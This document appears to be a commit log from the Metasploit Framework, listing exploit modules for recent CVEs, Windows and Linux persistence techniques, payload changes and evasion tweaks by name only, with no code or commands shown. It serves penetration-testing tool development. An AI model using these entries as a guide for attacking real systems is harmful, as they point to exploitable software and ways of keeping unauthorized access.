h00die c272d8a0aa burp extension persistence 2026-01-04 08:06:14 -05:00
h00die 30e8ede308 windows and linux build portions working, debugging java 2026-01-04 08:06:14 -05:00
h00die 190fab9b0a windows and linux build portions working 2026-01-04 08:06:14 -05:00
h00die 2213da29bb linux working, windows payload issues on compile and zip error on pre-built 2026-01-04 08:06:14 -05:00
h00die 8752110581 non-compile working just needs testing 2026-01-04 08:06:14 -05:00
h00die 24d1b43d2e more trial and error 2026-01-04 08:06:14 -05:00
h00die 349fd82327 burp extension persistence 2026-01-04 08:06:14 -05:00
h00die 773f2c4b8b burp extension persistence 2026-01-04 08:06:14 -05:00
h00die d7d7a318ed Add docs and tidy to userinit persistence 2026-01-03 16:27:54 -05:00
root d2c192e9bf windows persistence userinit v6 2026-01-03 15:37:44 -05:00
root cb7dd50731 windows persistence userinit v5 2026-01-03 15:21:20 -05:00
root f6fdbc4fbd windows persistence userinit v4 2026-01-03 14:43:50 -05:00
root beff06b9a4 windows persistence userinit v3 2026-01-03 11:09:14 -05:00
h00die c485d9a822 active setup persistence 2026-01-03 10:39:45 -05:00
6a6f656c 4a3a26e9d9 windows persistence userinit v2 2026-01-02 09:33:21 -05:00
6a6f656c 9d120c1eeb windows persistence userinit 2026-01-02 07:21:05 -05:00
h00die 7017273a84 bits persistence works 2026-01-01 19:55:22 -05:00
h00die 47c47df0bb bits persistence works 2026-01-01 08:28:03 -05:00
h00die e778f40055 bits persistence works but no delay happening 2026-01-01 08:05:41 -05:00
jenkins-metasploit 7eccbcdc6c Bump version of framework to 6.4.106 2026-01-01 03:35:39 +00:00
gregd c225256956 Add meterpreter scenario and redact IPs in documentation 2025-12-31 15:37:46 +00:00
gregd 475846ea2a Add Eclipse Che machine-exec unauthenticated RCE (CVE-2025-12548)
This module exploits an unauthenticated RCE vulnerability in the
Eclipse Che machine-exec service. The service accepts WebSocket
connections without authentication on port 3333, allowing command
execution via JSON-RPC.

Affects Red Hat OpenShift DevSpaces environments.
2025-12-30 21:14:55 +00:00
kukly 7772bd87f0 Fix teamviewer_password module errors 2025-12-30 16:07:23 +01:00
jenkins-metasploit db8028c219 automatic module_metadata_base.json update 2025-12-30 13:59:48 +00:00
Diego Ledda acc206b2dc Merge pull request #20833 from xaitax/CVE-2025-14847_Mongobleed
Add MongoDB memory disclosure module (CVE-2025-14847)
2025-12-30 08:49:30 -05:00
jenkins-metasploit 259180e73d automatic module_metadata_base.json update 2025-12-30 13:48:29 +00:00
Diego Ledda cd83a441b9 Merge pull request #20767 from Chocapikk/geoserver
Add GeoServer WMS GetMap XXE file read module (CVE-2025-58360)
2025-12-30 08:39:00 -05:00
Alex 3b3d4f238e Update cve_2025_14847_mongobleed.rb 2025-12-30 14:34:57 +01:00
Alex Hagenah ece7649af5 Update modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2025-12-30 14:25:22 +01:00
Alex 70798665aa Update cve_2025_14847_mongobleed.rb 2025-12-30 13:49:57 +01:00
Alex 44b2adafa7 Add MongoDB memory disclosure module (CVE-2025-14847) 2025-12-30 13:04:25 +01:00
DataExplorerX 102ef677b1 Add documentation for linux/samba/chain_reply module (CVE-2004-0883) 2025-12-30 16:17:51 +05:30
DataExplorerX 1e769ad5aa Fix broken links in CONTRIBUTING.md code-free contributions section 2025-12-30 15:34:03 +05:30
Rudraditya Thakur 4fbc647903 fixed: merge conflict 2025-12-28 23:41:36 +05:30
Rudraditya Thakur 8342493b3b Merge branch 'rapid7:master' into feature/kerberos-clock-skew 2025-12-28 23:16:27 +05:30
h00die 0a5cccf5e6 wsl startup folder persistence 2025-12-28 11:17:28 -05:00
h00die e97c23ca16 wsl startup folder persistence 2025-12-28 11:15:04 -05:00
randomstr1ng 911f8e4f6e fix !gsub output error 2025-12-28 09:57:39 +01:00
h00die 2b85112a36 fix panda local privesc refs 2025-12-27 09:09:19 -05:00
h00die 8838733f97 s4u persistence updates 2025-12-27 07:43:51 -05:00
h00die a44fe6f992 s4u persistence updates 2025-12-27 07:33:15 -05:00
randomstr1ng ba00ec5904 Merge branch 'rapid7:master' into master 2025-12-26 19:07:40 +01:00
Lukas Johannes Möller 982f5e0e28 control_web_panel_api_cmd_exec.rb aktualisieren
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-26 16:04:42 +01:00
Lukas Johannes Möller 0bfb77d74f control_web_panel_api_cmd_exec.rb aktualisieren
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-26 16:04:12 +01:00
JohannesLks 07e2d72ffe source address kernel decision 2025-12-26 09:25:20 -05:00
JohannesLks b6a8ac87b1 Improvements from PR 2025-12-26 09:20:10 -05:00
kali 2448429502 Add Prison Management System 1.0 auth RCE (CVE-2024-48594) 2025-12-26 08:08:49 +02:00
JohannesLks 78052b4ac1 multiple Improvements 2025-12-25 11:47:23 -05:00
JohannesLks 2cadcfe6ab add CVE-2025-68613 2025-12-25 11:21:28 -05:00
jenkins-metasploit 079d76da69 Bump version of framework to 6.4.105 2025-12-25 03:35:48 +00:00
Vaibhav Gupta 3fc047db5d fix: Allow Acunetix vulnerabilities to be imported without complete web_page data (#17932) 2025-12-24 22:47:37 +05:30
JohannesLks 5329e1472e fix: PR and Lint 2025-12-24 06:39:13 -05:00
JohannesLks 455275d087 add module for CVE-2025-67888 2025-12-23 19:21:34 -05:00
Jack Heysel 3c57c71baf Windows support 2025-12-22 19:27:37 -08:00
Spencer McIntyre d4eba39b1d Merge pull request #20800 from adfoster-r7/add-autocheck-vulnerability-logic
Add autocheck report_vuln logic
2025-12-22 15:58:18 -05:00
jenkins-metasploit f743b42353 automatic module_metadata_base.json update 2025-12-22 20:06:27 +00:00
Spencer McIntyre fba6040445 Merge pull request #20781 from jbx81-1337/fix/remove-ppc
remove ppc meterpreter
2025-12-22 14:56:48 -05:00
Spencer McIntyre 68965f667e Remove the ppc64le adapters
This is dead code now. We don't have any PPC64LE payloads.
2025-12-22 14:27:09 -05:00
adfoster-r7 34ceae4e2c Add autocheck report_vuln logic 2025-12-22 13:09:32 +00:00
JohannesLks 0ddb9fe027 Improvements from PR 2025-12-22 05:34:40 -05:00
Jack Heysel a44fc954a2 Cacti Graph Template authenticated RCE 2025-12-22 00:53:13 -08:00
JohannesLks cf0d1d04dc lint 2025-12-21 17:30:43 -05:00
JohannesLks 5c15623f1f add RHOST again 2025-12-21 17:27:01 -05:00
JohannesLks 05582a3344 lint 2025-12-21 16:55:22 -05:00
JohannesLks 1be2858a7a Add Module and Documentation for CVE-2025-14558 2025-12-21 16:41:14 -05:00
h00die 3ea866c41d udev persistence 2025-12-21 07:50:48 -05:00
jenkins-metasploit 1904145225 automatic module_metadata_base.json update 2025-12-19 23:51:36 +00:00
Brendan 3015c9f962 Merge pull request #20792 from sfewer-r7/hpe_oneview_rce
Add unauth RCE exploit module for HPE OneView (CVE-2025-37164)
2025-12-19 17:41:51 -06:00
jenkins-metasploit cd31acae15 automatic module_metadata_base.json update 2025-12-19 22:42:56 +00:00
Brendan b12ebc95c0 Merge pull request #20754 from h00die/assist_tech
assistive technology persistence
2025-12-19 16:33:21 -06:00
h00die eebfdc5a2a ssh_key persistence on windows now working 2025-12-19 17:26:17 -05:00
Valentin Lobstein 573a74dfa0 Add view/info.php endpoint to system root path leak (CVE-2025-34433) 2025-12-19 22:35:09 +01:00
Valentin Lobstein d8177fe9a1 DRY extract_system_root_from_cache 2025-12-19 22:05:29 +01:00
Valentin Lobstein 61b253a68d Refactor to cache endpoint responses and avoid duplicate requests 2025-12-19 22:03:07 +01:00
Valentin Lobstein 99b9e05179 Add comment about timezone fetching for uniqid calculations 2025-12-19 21:58:08 +01:00
Valentin Lobstein b1e8088498 Add comment about hashId requiring public videos 2025-12-19 21:56:53 +01:00
Valentin Lobstein 9cb8f34371 Add comment about default category deletion breaking exploit 2025-12-19 21:56:16 +01:00
Valentin Lobstein e4a6a9a71c Add comment about v20 path leak fix and fallback 2025-12-19 21:54:35 +01:00
Valentin Lobstein c5ea4bb87b Add comment about videosAndroid.json.php slow loading 2025-12-19 21:53:01 +01:00
Valentin Lobstein 8df7347791 Add AVideo notify.ffmpeg.json.php unauthenticated RCE exploit (CVE-2025-34433) 2025-12-19 21:51:41 +01:00
h00die 5ac586a788 Update modules/exploits/windows/persistence/assistive_technology.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2025-12-19 14:52:34 -05:00
sfewer-r7 d40a35acdb the version logic changes, update the docs 2025-12-19 15:48:07 +00:00
sfewer-r7 0c947d05ab add in the AKB analysis 2025-12-19 15:38:43 +00:00
sfewer-r7 5c6c8a3956 better check result given we have the version string 2025-12-19 15:38:27 +00:00
sfewer-r7 a4dba96712 add in the HPE OneView exploit 2025-12-19 15:30:53 +00:00
Martin Sutovsky 990c6a7a9f Adds check for presence of directory and sufficient rights 2025-12-19 14:31:05 +01:00
jenkins-metasploit 2bb30ba7a3 automatic module_metadata_base.json update 2025-12-18 22:13:06 +00:00
Brendan 6c4a61fa42 Merge pull request #20761 from Chocapikk/acf-extended-rce
Add WordPress ACF Extended unauthenticated RCE exploit (CVE-2025-13486)
2025-12-18 16:03:06 -06:00
h00die d15d4ca5dc .exe guard clause for assistive_tech persistence 2025-12-18 16:17:50 -05:00
h00die d150e8f633 sshkey persistence documentation improvements 2025-12-18 16:11:02 -05:00
Valentin Lobstein 080f74f862 Update Web-Check documentation with docker-compose.yml setup instructions 2025-12-18 19:19:17 +01:00
Valentin Lobstein 5178cdee42 Update Web-Check documentation with git clone command 2025-12-18 18:56:18 +01:00
Valentin Lobstein 13f102eb5b Add Web-Check screenshot API command injection RCE exploit (CVE-2025-32778) 2025-12-18 18:51:12 +01:00
vognik cd8f1593e4 fix version check 2025-12-18 09:12:36 -08:00
vognik 9fbf4e1d67 replace vprint_status with print_status in login.rb module 2025-12-18 08:59:55 -08:00
vognik 8fdb4ab43a add delay to sudobash drop file 2025-12-18 08:49:24 -08:00
vognik 51bfa8aab8 add use_inline_splunk_query option 2025-12-18 08:22:49 -08:00
Spencer McIntyre 76b7c82092 Fix a CI failure 2025-12-18 10:33:35 -05:00
Spencer McIntyre 602adeb4c5 Mass rubocop changes 2025-12-18 10:08:31 -05:00
jenkins-metasploit 019ac75f1b Bump version of framework to 6.4.104 2025-12-18 03:35:46 +00:00
jenkins-metasploit ecfdec95de automatic module_metadata_base.json update 2025-12-17 23:32:14 +00:00
adfoster-r7 4f13416117 Merge pull request #20787 from zeroSteiner/fix/payload-cache-sizes/2025-12-17
Update nodejs cache sizes
2025-12-17 23:22:26 +00:00
Valentin Lobstein d9498c35f9 Fix react2shell module: sync encoders and payload config with master version (had bad copy) 2025-12-17 23:52:30 +01:00
adfoster-r7 3b8c3d3007 Merge pull request #20771 from zeroSteiner/feat/lib/preferred-payloads
Update the payload preferences
2025-12-17 22:46:05 +00:00
Spencer McIntyre 05479c022a Update nodejs cache sizes 2025-12-17 17:33:51 -05:00
Spencer McIntyre d4b196b309 Update exploits to note target authors
Target authors were selected based on comments that indicated that the
author was only responsible for a set of descrete targets. Authors that
were noted as assisting with target testing, check module development,
etc. were left at the module level.
2025-12-17 17:30:16 -05:00
adfoster-r7 b3f3b82f36 Merge pull request #20783 from adfoster-r7/update-pro-versions
Update Pro versions
2025-12-17 22:29:25 +00:00
Valentin Lobstein 3b407575fa Update react2shell module: Add Waku framework support 2025-12-17 23:07:01 +01:00
Spencer McIntyre 276623f36b Also merge Author and References from the target 2025-12-17 16:31:54 -05:00
Spencer McIntyre 8945267db6 Remove redundant Platform and Arch definitions 2025-12-17 16:12:31 -05:00
Spencer McIntyre 2103e1b5f6 Fix a bug in the platform definition 2025-12-17 15:57:58 -05:00
Spencer McIntyre 61a7e05f9d Merge target info into module info
This means it no longer has to be specified twice.
2025-12-17 14:38:14 -05:00
vognik 59dc9dd59c fix error handling 2025-12-17 09:57:03 -08:00
vognik 6d059bd62e improve csrf token parsing 2025-12-17 09:53:28 -08:00
adfoster-r7 375ff5e9da Update Pro versions 2025-12-17 13:41:31 +00:00
vognik 1d4b8ce10e add pagination support to get_apps function 2025-12-16 10:03:08 -08:00
jbx81-1337 17ea7f0e53 fix: remove ppc meterpreter from payloads_spec 2025-12-16 11:19:45 +01:00
jbx81-1337 48c21f5c45 fix: remove broken ppc meterpreters 2025-12-16 11:17:07 +01:00
h00die 41a2b49ef8 sshkey persistence documentation improvements 2025-12-15 20:30:45 -05:00
h00die a2a3eebe68 sshkey persistence working on linux 2025-12-15 20:25:10 -05:00
jenkins-metasploit 040179cf40 automatic module_metadata_base.json update 2025-12-16 00:04:05 +00:00
Spencer McIntyre 74774783fc Merge pull request #20773 from jheysel-r7/fix/react2shell_targets
Change react2shell default encoder and payload
2025-12-15 18:55:09 -05:00
Jack Heysel 0589121fb9 Update payload options 2025-12-15 18:52:38 -05:00
jheysel-r7 ff188b8a5e Update regex
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-15 08:08:54 -08:00
cgranleese-r7 ee6d594dd1 Merge pull request #20777 from rapid7/revert-20424-enh/MS-9930/vuln_report
Revert "Vulnerability Report Enhancement"
2025-12-15 13:00:22 +00:00
cgranleese-r7 c35537252f Revert "Vulnerability Report Enhancement" 2025-12-15 12:40:02 +00:00
cgranleese-r7 3936fc7640 Merge pull request #20424 from cdelafuente-r7/enh/MS-9930/vuln_report
Vulnerability Report Enhancement
2025-12-15 11:51:27 +00:00
Christophe De La Fuente fbea976e2f Bump metasploit_data_models version to 6.0.11 2025-12-15 12:36:51 +01:00
Spencer McIntyre 3dc70b751a Report the ICertPassage protocol using the new API 2025-12-15 12:36:51 +01:00
Christophe De La Fuente 3a6eec5691 Fix deleting services with services -d 2025-12-15 12:36:51 +01:00
Christophe De La Fuente 09e7bff7f5 Code review 2025-12-15 12:36:50 +01:00
Christophe De La Fuente 40ac35c02a Vulnerability Report enhancement
- update `#report_service` and `#report_vuln`
- update vulnerability report when a session is established
- update CheckCode and `#cmd_check` to report a vulnerability when
  Vulnerable checkcode is returned
- update `vulns` and `services` commands to display the `resource` and
  parent services
- specs
2025-12-15 12:36:50 +01:00
cgranleese-r7 861700b1f6 Merge pull request #20776 from cgranleese-r7/update-macos-runner
Updates macos runners
2025-12-15 11:26:56 +00:00
cgranleese-r7 afcfd1bbc5 Updates macos runners 2025-12-15 10:16:53 +00:00
vognik 8977538910 add docker lab deploy guide into docs 2025-12-13 12:28:55 -08:00
vognik 055d243d05 add create_sudobash payload option 2025-12-13 12:00:08 -08:00
vognik 7149b9a960 randomize provider name in payload 2025-12-13 11:46:47 -08:00
vognik 35dd55159d extracted get_apps url into uris.rb 2025-12-13 11:35:25 -08:00
vognik ebd736272f fix variables naming 2025-12-13 11:21:08 -08:00
Valentin Lobstein bd98d3b160 Add randomization to GeoServer WMS GetMap XXE module for evasion
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-13 17:42:21 +01:00
rumet 23291f2f5e Fix PostgreSQL 15+ public schema permission issue 2025-12-13 15:37:18 +03:00
vognik 4ff2f35154 fix credits 2025-12-12 20:59:29 -08:00
vognik b35c8b3926 remove unused function calls 2025-12-12 20:31:14 -08:00
Jack Heysel ca2ac75e16 Change react2shell default encoder 2025-12-12 15:22:34 -08:00
vognik 0f96f2f3fd fix cve format in references 2025-12-12 13:45:52 -08:00
vognik da0dc35cb8 add documentation 2025-12-12 13:44:44 -08:00
vognik ee404d9453 add splunk modules (cve-2022-43571 and cve-2024-36985) 2025-12-12 13:16:57 -08:00
Rumet eb7f60d6d4 Fix typo in normalize_host causing AWS SSM session failures with database 2025-12-13 00:05:34 +03:00
Spencer McIntyre 9cd49466e8 Update the payload preferences 2025-12-12 15:29:37 -05:00
Valentin Lobstein 46f87e0f6e Add GeoServer WMS GetMap XXE file read module (CVE-2025-58360) 2025-12-12 16:11:15 +01:00
jenkins-metasploit 05fba0ad8f automatic module_metadata_base.json update 2025-12-12 00:21:44 +00:00
jheysel-r7 388a967101 Merge pull request #20749 from nakkouchtarek/grav-ssti-rce
Add Grav CMS Twig SSTI Sandbox Bypass RCE Exploit Module & Documentation
2025-12-11 16:13:09 -08:00
jenkins-metasploit 7ca43c621b automatic module_metadata_base.json update 2025-12-11 19:19:18 +00:00
jheysel-r7 33197bd59c Merge pull request #20713 from Chocapikk/nable
Add N-able N-Central authentication bypass and XXE scanner module (CVE-2025-9316, CVE-2025-11700)
2025-12-11 11:10:48 -08:00
Tarek Nakkouch a20e2dfa6e Use send_request_cgi! for automatic redirect handling 2025-12-11 20:03:17 +01:00
Tarek Nakkouch 028aa2f544 Wrap zlib require in begin/rescue block for proper error handling 2025-12-11 19:53:02 +01:00
Tarek Nakkouch df9f546d01 Use HttpClientTimeout datastore option instead of hardcoded timeout value 2025-12-11 19:52:16 +01:00
Tarek Nakkouch 80f60b431c Set default value for FORM_NAME option and remove fallback check 2025-12-11 19:45:24 +01:00
MatDupas 591a2706cb Fix setup guide link for Oracle EBS
Updated the link to the Oracle EBS setup guide to an archived version.
2025-12-11 19:24:16 +01:00
MatDupas eaa15dbc70 Update CSRF token logging for better visibility 2025-12-11 19:21:54 +01:00
Valentin Lobstein 35d7b2e334 Improve file content parsing in extract_file_contents method 2025-12-11 18:57:18 +01:00
cgranleese-r7 1523d01a8d Merge pull request #20759 from zeroSteiner/fix/ldap-acceptance/1
Drop the ldap_esc_vulnerable_cert_finder tests
2025-12-11 16:30:26 +00:00
jenkins-metasploit 4d5996a5ff automatic module_metadata_base.json update 2025-12-11 13:06:50 +00:00
cgranleese-r7 f7abf967a6 Merge pull request #20743 from zeroSteiner/fix/mssql-encryption-guard
Remove the TDSENCRYPTION Guard Clause
2025-12-11 12:58:09 +00:00
jenkins-metasploit 0384917038 Bump version of framework to 6.4.103 2025-12-11 10:24:16 +00:00
bcoles 5871d90cf6 Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads 2025-12-11 12:53:47 +11:00
ptrstr 30635cbadd Make plugin URI configurable 2025-12-10 18:14:26 -05:00
jenkins-metasploit c8773660fb automatic module_metadata_base.json update 2025-12-10 17:05:19 +00:00
jheysel-r7 0c921ea2e7 Merge pull request #20725 from Chocapikk/magento
Add Magento SessionReaper (CVE-2025-54236) exploit module
2025-12-10 08:56:47 -08:00
jenkins-metasploit ba258777f2 automatic module_metadata_base.json update 2025-12-10 16:45:52 +00:00
jheysel-r7 d86c5f0908 Merge pull request #20746 from Chocapikk/king-addons
Add WordPress King Addons privilege escalation exploit (CVE-2025-8489)
2025-12-10 08:37:11 -08:00
Martin Sutovsky 6a626a855b Addresses some comments 2025-12-10 17:01:27 +01:00
jenkins-metasploit 2b58dec0f3 automatic module_metadata_base.json update 2025-12-10 13:11:54 +00:00
Diego Ledda 27557e149d Merge pull request #20682 from bcoles/loongarch64
Add support for LoongArch64 payloads
2025-12-10 08:02:26 -05:00
Diego Ledda efcb07a53f fix: restoring missing end after merge 2025-12-10 13:11:21 +01:00
Diego Ledda d6560b951f Merge branch 'master' into loongarch64 2025-12-10 07:08:40 -05:00
h00die b9dc042838 sshkey persistence working on linux 2025-12-10 04:32:38 -05:00
h00die c2adbf7625 ssh key progresss 2025-12-10 04:32:37 -05:00
h00die f221eb1aef rename sshkey module 2025-12-10 04:32:37 -05:00
Valentin Lobstein be4c3c1a91 Update modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-12-10 06:07:41 +01:00
Valentin Lobstein fc8f07cf91 Update modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-12-10 06:07:23 +01:00
Valentin Lobstein b4d65afcf5 Add exploit module for WordPress ACF Extended CVE-2025-13486 unauthenticated RCE 2025-12-09 22:02:41 +01:00
jheysel-r7 47771a6789 Merge pull request #20760 from sfewer-r7/fix-55182
fix a typo with the use of CVE-2025-55102, it should be CVE-2025-55182
2025-12-09 10:32:33 -08:00
Valentin Lobstein e9467cd1e3 Clarify file-based session storage requirements and exploit limitations
Co-authored-by: jheysel-r7 <jheysel-r7@users.noreply.github.com>
2025-12-09 19:26:30 +01:00
Valentin Lobstein 6bc2bffd8c Refactor create_admin_user to handle errors internally and remove custom.ini from documentation 2025-12-09 19:20:56 +01:00
Valentin Lobstein 1596d42c6a Update modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Co-authored-by: Phil Townes <phil_townes@rapid7.com>
2025-12-09 19:14:44 +01:00
Valentin Lobstein c423ff07c5 Update modules/exploits/multi/http/wp_king_addons_privilege_escalation.rb
Co-authored-by: Phil Townes <phil_townes@rapid7.com>
2025-12-09 19:14:36 +01:00
Valentin Lobstein 17cc68df0f Update documentation/modules/exploit/multi/http/wp_king_addons_privilege_escalation.md
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-09 19:14:22 +01:00
jenkins-metasploit 3e3eb12c57 automatic module_metadata_base.json update 2025-12-09 12:15:57 +00:00
Diego Ledda 9489296664 Merge pull request #20758 from msutovsky-r7/payload/ppc/fetch_payloads
Adds PPC reverse payloads to fetch adapters
2025-12-09 07:04:14 -05:00
sfewer-r7 1a8e88c054 fix a typo with the use of CVE-2025-55102, it should be CVE-2025-55182 2025-12-09 09:05:59 +00:00
jenkins-metasploit ba648b3371 automatic module_metadata_base.json update 2025-12-08 23:52:15 +00:00
Brendan caa672231b Merge pull request #20736 from sfewer-r7/fortiweb-exploit-rce-v6-support
Update the FortiWeb exploit module (CVE-2025-64446 + CVE-2025-58034) to target older unsupported versions 6.x
2025-12-08 17:43:49 -06:00
jenkins-metasploit 0e71557829 automatic module_metadata_base.json update 2025-12-08 21:50:27 +00:00
jheysel-r7 66279422d1 Merge pull request #20747 from vognik/2025-55182
Add CVE-2025-55182 / CVE-2025-66478
2025-12-08 13:41:49 -08:00
Spencer McIntyre b9d3780afe Drop the ldap_esc_vulnerable_cert_finder tests 2025-12-08 16:30:49 -05:00
h00die f18bdb12b2 remove writabledir from wmi persistence 2025-12-08 15:41:16 -05:00
Tarek Nakkouch e45eda6ead Replace gsub with encode_base64 delimiter parameter
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-08 19:48:01 +01:00
Martin Sutovsky f8ae3912be Rubocopes 2025-12-08 17:32:28 +01:00
Martin Sutovsky 62d02675ce Adds reverse shell payloads to PPC fetch adapters 2025-12-08 17:31:55 +01:00
jenkins-metasploit 2777178962 automatic module_metadata_base.json update 2025-12-08 15:53:57 +00:00
cpomfret-r7 2a53d9c866 Merge pull request #20704 from dwelch-r7/combine-ssh-login-modules
The module `auxiliary/scanner/ssh/ssh_login_pubkey` has been removed.
Its functionality has been moved into `auxiliary/scanner/ssh/ssh_login`.
2025-12-08 15:44:58 +00:00
Tarek Nakkouch e08c18c720 Remove ARTIFACTS_ON_DISK side effect
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-08 15:42:29 +01:00
Tarek Nakkouch 77f4fe9c98 Update module name
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-08 15:41:31 +01:00
vognik bdd7cb5365 upgraded payload 2025-12-08 01:32:43 -08:00
Tarek Nakkouch 5fcc33d203 Implement zlib compression before base64 encoding to minimize payload size 2025-12-07 22:25:51 +01:00
Rudraditya Thakur c49a376280 added: Option to adjust kerberos clock (issue-> #20587)
- Added KrbClockSkew advanced option and parser to offset Kerberos timestamps
- Propagate skew through Kerberos client/authenticators (LDAP/SMB/HTTP/WinRM/MSSQL) and scanners
- Updated docs for new option and extended kerberos client specs for clock skew handling
- Clean up kerberos client error handling/style per rubocop
2025-12-08 01:47:51 +05:30
Tarek Nakkouch d17dc184bf Strengthen Grav CMS fingerprinting with strict HTML parsing 2025-12-07 17:14:35 +01:00
h00die 54d47e72ab sticky keys description update 2025-12-07 07:40:54 -05:00
h00die bd48eda8b2 rename sticky keys module 2025-12-07 07:38:41 -05:00
MatDupas 6d79e9a858 Improve XML formatting in send_exploit_request method
Refactor XML string for better readability.
2025-12-07 08:26:01 +01:00
MatDupas 7b9cc2800f Remove keep-alive logic for XSL delivery
Removed unnecessary server keep-alive logic after XSL delivery.
2025-12-07 08:11:42 +01:00
MatDupas a8a84a6c99 Fix command adaptation for Windows platform 2025-12-07 08:09:05 +01:00
h00die 42b6a307ac markdown 2025-12-06 19:58:36 -05:00
h00die a2f266068b assistive technology persistence 2025-12-06 13:05:32 -05:00
MatDupas f56a3cc914 Refactor comments and improve logging in exploit 2025-12-06 15:41:30 +01:00
MatDupas a4b88df7ac Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-06 15:38:42 +01:00
vognik 1dde12b483 fix naming errors 2025-12-06 02:53:38 -08:00
vognik 38682b5ed6 refactoring 2025-12-05 14:58:59 -08:00
vognik e1982475ca replaced the noisy check method with a silent one 2025-12-05 11:32:07 -08:00
vognik 7b8c08d778 some refactoring 2025-12-05 10:47:06 -08:00
jenkins-metasploit 0fd8f0984e Bump version of framework to 6.4.102 2025-12-05 17:16:16 +00:00
jenkins-metasploit 97c9e8274f automatic module_metadata_base.json update 2025-12-05 16:17:18 +00:00
Diego Ledda 7e48e12ed0 Merge pull request #20716 from bcoles/linux-riscv-prepends
Add Linux RISC-V 32-bit/64-bit prepends
2025-12-05 11:04:24 -05:00
vognik 88309b5a4a add suggestions from @Chocapikk 2025-12-05 08:02:56 -08:00
Diego Ledda d66e93afc0 Merge pull request #20658 from jheysel-r7/feat/mod/cert_details_update
Add Updates to LDAP ESC Vulnerable Cert Finder
2025-12-05 10:55:52 -05:00
Spencer McIntyre c77578dbe8 Merge pull request #20681 from jheysel-r7/fix/test/ldap_whoami_error
Remove ldap_esc_vulnerable_cert_finder acceptance test
2025-12-05 10:55:06 -05:00
MatDupas 2754087ed9 Remove wait time before server URL construction
Removed unnecessary sleep before constructing server URL.
2025-12-05 16:50:30 +01:00
MatDupas 5d49fb9e53 Change base command from bash to sh for compatibility 2025-12-05 16:39:56 +01:00
MatDupas a33fbe3ef5 Refactor payload encoding in cook_smuggle_stub method
Replaced manual HTML encoding with Rex::Text.html_encode for better payload handling.
2025-12-05 16:38:30 +01:00
MatDupas d3bda52631 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-05 15:45:05 +01:00
MatDupas 976a835557 Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Mark @xsl as served once it has actually been served.

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-05 15:39:16 +01:00
MatDupas 145a2a63de Update modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2025-12-05 15:36:56 +01:00
h00die 54718c7a12 sticky keys as persistence 2025-12-05 07:07:30 -05:00
Mathieu Dupas 9989fa6d39 Add SRVPORT info 2025-12-05 12:14:15 +01:00
MatDupas cdba4f49ae Add Oracle EBS CVE-2025-61882 RCE exploit module
This module exploits CVE-2025-61882 in Oracle E-Business Suite by combining SSRF, Path Traversal, HTTP request smuggling, and XSLT injection to achieve remote code execution.
2025-12-05 11:12:07 +01:00
MatDupas cd2e13c71d Document CVE-2025-61882 exploit for Oracle EBS
Added documentation for CVE-2025-61882 exploit module in Oracle EBS, detailing vulnerability, testing setup, verification steps, and usage scenarios.
2025-12-05 11:05:42 +01:00
vognik 918f474fc6 fixed the nits 2025-12-05 00:47:19 -08:00
vognik 3669e3cdcc add unused code 2025-12-05 00:25:21 -08:00
vognik b6188e6f50 fix target_uri error 2025-12-05 00:12:52 -08:00
vognik baa0a11492 small fixes 2025-12-05 00:11:44 -08:00
vognik 770e63b0d1 add windows documentation 2025-12-05 00:06:58 -08:00
vognik a12431e1a3 add suggestions from @sfewer-r7 2025-12-04 23:58:22 -08:00
Maksim Rogov 5b299a0489 Update modules/exploits/multi/http/react2shell_cve_2025_55102.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2025-12-05 10:10:51 +03:00
Maksim Rogov d9977f31fc Update modules/exploits/multi/http/react2shell_cve_2025_55102.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2025-12-05 10:10:35 +03:00
vognik e51ea0ae23 improve documentation 2025-12-04 23:03:13 -08:00
vognik bff7d0836a change execSync to exec 2025-12-04 22:54:35 -08:00
vognik 23e5f68c87 remove debug 2025-12-04 22:44:23 -08:00
vognik f71a71ab18 add exploit mvp 2025-12-04 22:16:27 -08:00
Jack Heysel 0e2af23287 Add Updates to LDAP ESC Vulnerable Cert Finder
Add CertificateAuthorityRhost to avoid DNS failures
2025-12-04 17:03:36 -08:00
Tarek Nakkouch 3c4fdfcad0 Add Grav CMS Twig SSTI Sandbox Bypass RCE Exploit Module (CVE-2025-66294) 2025-12-05 00:01:56 +01:00
Kyle Bouchard 7b816cd439 Add year and month options for file upload 2025-12-04 11:33:28 -05:00
vognik eb33e08efa Add Documentation 2025-12-04 05:48:26 -08:00
vognik 3086dac5a1 Add CVE-2025-55182 / CVE-2025-66478 Scanner 2025-12-04 05:21:09 -08:00
jenkins-metasploit adc3d2e175 automatic module_metadata_base.json update 2025-12-04 12:05:42 +00:00
Diego Ledda 4d52e22480 Merge pull request #20720 from Chocapikk/wp-ai-engine
Add WordPress AI Engine MCP RCE exploit (CVE-2025-11749)
2025-12-04 12:56:04 +01:00
Valentin Lobstein 5781e5ba7d Update reference URL 2025-12-04 01:52:25 +01:00
